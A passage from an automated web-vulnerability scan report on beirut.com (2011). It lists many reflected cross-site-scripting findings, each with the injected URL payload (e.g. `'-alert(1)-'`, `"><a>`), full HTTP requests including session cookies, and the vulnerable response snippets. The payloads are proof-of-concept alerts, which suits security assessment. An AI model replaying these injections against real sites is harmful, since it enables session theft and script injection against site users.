The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc761"><a>abd963421ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetbc761"><a>abd963421ce/Games-Entertainment/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:05:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetbc761"><a>abd963421ce">
...[SNIP]...

4.623. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Games-Entertainment/078114628

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d557'-alert(1)-'b81dfa7d8c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet2d557'-alert(1)-'b81dfa7d8c1/Games-Entertainment/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet2d557'-alert(1)-'b81dfa7d8c1/Games-Entertainment';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.624. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Games-Entertainment/078114628

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a135b'-alert(1)-'e52a7348b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Games-Entertainmenta135b'-alert(1)-'e52a7348b3e/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Games-Entertainmenta135b'-alert(1)-'e52a7348b3e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.625. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 732b5'-alert(1)-'3ad890a46c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet732b5'-alert(1)-'3ad890a46c9/Health-and-Wellbeing/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:18:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet732b5'-alert(1)-'3ad890a46c9/Health-and-Wellbeing';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.626. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d48"><a>cc78e914fdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetc7d48"><a>cc78e914fdc/Health-and-Wellbeing/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:09:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetc7d48"><a>cc78e914fdc">
...[SNIP]...

4.627. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a9dc'-alert(1)-'ecbd8c13fe7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Health-and-Wellbeing9a9dc'-alert(1)-'ecbd8c13fe7/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:24:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet/Health-and-Wellbeing9a9dc'-alert(1)-'ecbd8c13fe7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.628. http://www.beirut.com/Online-Internet/Music/4018807677 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Music/4018807677

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd107"><a>97c2a516488 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetbd107"><a>97c2a516488/Music/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:12:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetbd107"><a>97c2a516488">
...[SNIP]...

4.629. http://www.beirut.com/Online-Internet/Music/4018807677 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Music/4018807677

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f632'-alert(1)-'cf800f69740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet9f632'-alert(1)-'cf800f69740/Music/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:20:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet9f632'-alert(1)-'cf800f69740/Music';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.630. http://www.beirut.com/Online-Internet/Music/4018807677 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Music/4018807677

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3de79'-alert(1)-'f6cd12a9cff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Music3de79'-alert(1)-'f6cd12a9cff/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:25:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet/Music3de79'-alert(1)-'f6cd12a9cff';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.631. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82e25'-alert(1)-'debe35d86d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet82e25'-alert(1)-'debe35d86d4/Nights-Food-and-Drink/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:26:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet82e25'-alert(1)-'debe35d86d4/Nights-Food-and-Drink';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.632. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4517f"><a>1812591b343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet4517f"><a>1812591b343/Nights-Food-and-Drink/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet4517f"><a>1812591b343">
...[SNIP]...

4.633. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54eaf'-alert(1)-'3acb95183ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Nights-Food-and-Drink54eaf'-alert(1)-'3acb95183ae/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:30:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Nights-Food-and-Drink54eaf'-alert(1)-'3acb95183ae';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.634. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1c2"><a>9eca5424fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet2b1c2"><a>9eca5424fd5/Personal-and-Opinion/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:12:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet2b1c2"><a>9eca5424fd5">
...[SNIP]...

4.635. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3793c'-alert(1)-'8f530d683c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

